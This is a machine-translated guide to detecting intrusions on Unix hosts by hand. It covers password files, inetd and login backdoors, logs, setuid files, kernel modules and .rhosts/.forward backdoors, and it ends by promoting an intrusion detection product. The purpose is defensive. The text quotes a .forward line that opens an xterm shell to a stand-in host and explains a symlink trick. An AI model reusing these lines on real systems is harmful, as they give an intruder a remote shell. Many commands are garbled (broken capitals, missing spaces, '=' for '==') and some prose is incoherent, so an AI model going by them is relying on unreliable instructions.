UNIX intrusion Monitoring SystemFrom: http://www.1717happy.com /? Action = show & id = 102 because Unix systems often undertake key tasks, they are often the first choice for intruders to attack. Therefore, intrusion detection and system security protection are one of the most important tasks of administrators. So, without the help of other work, how can we determine the current security of the system? How can we discover intrusions? The following describes some common check methods. Linux and Solaris are used as examples:
1. Check the system password file
First, check the passwd file, LS-L/etc/passwd, and check the file modification date.
Enter the command awk-F: '$3 = 0 {print $1}'/etc/passwd to check the privileged users in the passwd file, users with UID 0 in the system will be displayed. By the way, check whether there is a blank password account in the system: awk-F: 'length ($2) ==0 {print $1} '/etc/shadow
2. Check the process to see if there are any strange processes.
Focus on viewing processes: PS-AEF | grep inetd
Inetd is a UNIX system daemon, And the PID of the normal inetd is relatively high. If you see an output similar to inetd-S/tmp /. processes such as XXX focus on the content after inetd-s. Under normal circumstances, the inetd service in Linux does not have the-S parameter after it, and of course it does not use inetd to start a file. In Solaris, it is only inetd-s, it also does not use inetd to start a specific file. If you use the ps command to see that inetd started a file, and you did not use inetd to start this file, it means that someone has intruded into your system and started a simple backdoor with the root permission.
Enter PS-AEF to view the output information, especially if there are any processes starting with./xxx. Once a suspicious process is found, check the backdoor program left by the intruder and run kill-9 PID to kill the process. Then run PS-AEF to check whether the process is killed; once such a process is killed and restarted, it indicates that the system has been placed with a script to automatically start the program. At this time, you need to perform a careful search: Find/-name program name-print. if the system is really put into a backdoor by intruders, according to the directory where the found program is located, in UNIX, hidden processes are sometimes replaced by PS files. This method involves checking the integrity of the file. We will discuss this method later. Next, find the file directory on the server where the attacker is located, and track it step by step.
3. Check the system daemon process
Check the/etc/inetd. conf file and enter CAT/etc/inetd. conf | grep-V "^ #". The output information is the remote service enabled on your machine. Generally, intruders can directly replace in. xxx program to create a backdoor, such as replacing in with/bin/sh. telnetd, and then restart the inetd service. Then, all users who telnet to the server will directly obtain a rootshell without entering the user name and password.
4. Check the network connection and listening port
Enter netstat-An to list all the connection and listening ports on the local machine and check whether there are any illegal connections.
Enter netstat-Rn to check whether the local route and gateway settings are correct.
Enter ifconfig-a to view the NIC settings.
5. Check System Logs
Command last | more to view the historical records of all users logging on to the local machine under normal conditions. However, the last command depends on the syslog process, which has become an important target of intruders. Intruders usually stop the system syslog, view the system syslog process, and determine whether the last syslog start time is normal, because syslog is executed as root, if syslog activity is found illegal, it indicates a major intrusion event.
Input LS-Al/var/log in Linux
Enter LS-Al/var/adm under Solaris
Check whether the integrity and modification time of wtmp utmp files, including messgae files, are normal. This is also a way to manually erase intrusion traces.
6. Check the core file in the system.
Sending malformed requests to attack a server's service to intrude into the system is a conventional intrusion method, which is a typical RPC attack. This method has a certain success rate. That is to say, it cannot successfully intrude into the system by 100%. In addition, core files are usually generated in the corresponding directory of the server and the core files in the system are searched globally, enter find/-name core-exec LS-l {}. Check the Core File Based on the directory where the core is located and whether there is any intrusion.
7. Check System File integrity
There are multiple methods to check file integrity. Generally, you can enter the LS-l file name to query and compare files. This method is simple but practical. However, if the LS files have been replaced, it is more troublesome. In Linux, you can use rpm-V 'rpm-QF filename 'to query and check whether the query result is normal to check whether the file is complete. In Linux, there are also many methods to use RPM to check the file integrity. Here we will not repeat them here. Man rpm can be used to obtain more formats.
In Unix systems,/bin/login is a file often replaced by a backdoor by intruders. Next, let's talk about the login BACKDOOR:
In UNIX, the login program is usually used to verify passwords of Telnet users. Attackers can obtain and modify the source code of login so that they can check the backdoor password before entering and storing the password. If you press the backdoor password, it will ignore the password set by the Administrator to drive you straight into: This will allow intruders to access any account, or even the root directory. Because the backdoor password is an access generated before the user logs on and is logged to utmp and wtmp, intruders can log on to the shell without exposing this account. After the Administrator notices this backdoor, use the "strings" command to search for the login program for text information. In many cases, the backdoor password is exposed. Intruders will start to encrypt or change the hidden password to invalidate the strings command. Therefore, many administrators use MD5 checksum to detect such backdoors. The md5sum command is available in Unix systems. Enter the md5sum file name to check the MD5 Signature of the file. The usage format is as follows: md5sum-B reads files in binary mode; md5sum-C reverse checks MD5 signatures; md5sum-T reads files in text mode.
As mentioned above, the daemon configuration file for the daemon is inetd. the lines not commented out in conf must be carefully compared. For example, if you open the telnet service, the daemon configuration file contains the following: telnet stream tcp Nowait root/usr/sbin/in. telnetd in. telnetd
The file used is/usr/sbin/in. telnetd checks the integrity of the file. Intruders often create a backdoor for themselves by replacing the service files allowed by the daemon.
In Linux, the/etc/crontab file is often used by intruders. to check the integrity of the file, you can directly CAT/etc/crontab, carefully read whether the file has been used by intruders to do other things.
There is a defect in using a process to start a backdoor without replacing files such as login, that is, the process is killed once the system restarts, so you have to enable this backdoor when the system starts. Check the files in/etc/rc. d to check whether the system starts with a backdoor.
Here, we also mention that if an existing file with the property "-rwsr-XR-x 1 Root XXX" is issued in a directory. sh, which indicates that any user can obtain a rootshell after running this file. This is the setuid file. Run find-Perm 4000-print to perform global search for such files, and then delete such files.
8. Check for kernel-level Backdoors
If your system is installed with such a backdoor, it is usually troublesome. First, check the modules loaded by the system and use the lsmod command in Linux, run the modinfo command in the Solaris system. It should be noted that by default, Linux is usually installed with fewer modules, which is usually the driver of the NIC. There are many modules under Solaris. There is no other way, analysis is performed in one place. After the kernel is reinforced, the insertion or deletion of modules should be prohibited to protect system security. Otherwise, intruders may replace system calls again. We can replace create_module () and delete_module () to achieve the above purpose. In addition, the kernel should be reinforced as early as possible to prevent system calls from being replaced by intruders. If the system is loaded with backdoor modules, they are not displayed in the module list/proc/module. In this case, you need to carefully search for the/proc directory and identify the hidden and disguised processes based on the found files and experience. Of course, the directory may not be hidden.
9. rhosts and. Forward
These are two well-known backdoor files. If you want to check whether your system has been installed with backdoors by intruders, you can search for these two files globally:
Find/-name ". rhosts"-print
Find/-name ". Forward"-print
Under $ home of a user ,. it is very dangerous to include only two + numbers in the rhosts file. If port 513 (rlogin port) is enabled on your system ), then anyone can use this user to log on to your system without any verification.
In UNIX, placing commands in the. forward file is a common method for re-access. forward under $ home may be set as follows:
Username | "/usr/local/X11/bin/xterm-disp hacksys. Other. DOM: 0.0-E/bin/sh"
The deformation of this method includes changing the alias file of the System Mail (usually located in/etc/aliases ). note that this is just a simple transformation. more advanced. run a simple script in forward to execute arbitrary commands in standard input (after partial preprocessing ). smrsh can effectively stop such backdoors (although it is likely that there are still problems if you allow self-running Elm's filter or procmail programs. In the Solaris system, if you run the following command:
Ln-S/var/mail/luser ~ /. Forward
Then, if vacation is set to valid,/var/mail/luser will be copied ~ /. Forward, "|/usr/bin/vacation me" will be appended, and the old symlink will be moved ~ /. Forward... backup.
You can also directly Delete these two files.
10. Defects of manual Intrusion Detection
I talked about some manual intrusion detection methods, but these methods have some defects and some are even inevitable. This is why manual detection is a "physical activity. Let's take a look at these defects:
1) manual intrusion detection can only be performed based on the host. That is to say, all intrusion detection work can only be performed under the operating system, which is an inherent defect; basically, all intrusions beyond the operating system cannot be detected. Network-level intrusion, intrusion and attack behaviors on switches and routers are unknown to the operating system of the server. Information has been sent from the host, if the host is intercepted during transmission, the operating system of the host will never be indifferent.
2) manual intrusion detection requires you to be proficient in the operating system and refresh the vulnerability library quickly. You must be a hacker while working as a network administrator. It can be said that the accumulation of experience will never keep up with the updates of vulnerability information around the world, and it is difficult to protect the system from being infiltrated by new vulnerabilities.
3) manual intrusion detection is just a matter of fact. The system determines the intrusion event based on a specific situation and then provides corresponding and preventive measures, however, you cannot describe attack events in advance based on the intrusion detection behavior of intruders, define the event level, and prevent the next intrusion to the system without affecting the normal operation of the system.
4) You can detect some vulnerabilities on the host through manual intrusion detection, and then take corresponding security measures. However, it cannot prevent two intruders from using the same vulnerability to attack the host, that is, they cannot determine the attack mode to cut off the intrusion.
5) In conclusion, manual intrusion detection is only a cure for system security, and most of them rely on the skills and experience of administrators to enhance system security, it is also impossible to form a real security system. Although it is better than nothing, it can detect and track some intrusion behaviors, but it is difficult to catch the trace if it encounters intruders who are also proficient in the system.
11. Comparison of Intrusion Detection Systems
Building a real security system requires an intrusion detection system-IDs. An excellent intrusion detection system, coupled with the skills and experience of the system administrator, can form a real security system to effectively judge and cut off intrusion behaviors, protect hosts and data. Sometimes people think that the RealSecure of ISS is an excellent Intrusion Detection System. Otherwise, RealSecure has certain defects, not to mention its false positive, false positive, or false positive for the event, first, it is an English software, which is difficult to use and be familiar. As a foreigner's software, many hack has made in-depth research on RealSecure and has discovered some of its vulnerabilities, or even inherent vulnerabilities, I have tested some attack techniques that can paralyze RealSecure. In addition, RealSecure is also set up on the server operating system, and the operating system stops working. In other words, it is very simple. The target of an attacker attack is often RealSecure itself. Imagine, if your system depends on the intrusion detection system, and the intrusion detection system is destroyed by attackers, then your system will open the door and let it go. The consequences are unimaginable.
The Chinese-speaking intrusion detection system is of course a great deal. The tianyao detection engine is a typical one. It has its own "black box". When intruders attack a server, it is almost impossible to find the daily detection engine running on the server, which greatly increases the attack difficulty and security of the server. Information about day 7 can be found in http://www.venustech.com.cn. Comparison and technical analysis of intrusion detection systems,
Manual intrusion detection is only a cure for system security, and most of them rely on the skills and experience of administrators to enhance the security of the system. No, it is impossible to form a real security system, although it is better than not, it can detect and track some intrusion behaviors, but it is difficult to catch the trace if it encounters intruders who are also proficient in the system. To build a real security system, you must use an intrusion detection system. An excellent intrusion detection system, coupled with the skills and experience of the system administrator, can form a real security system, effectively judging and cutting off intrusion behaviors, protect hosts and data.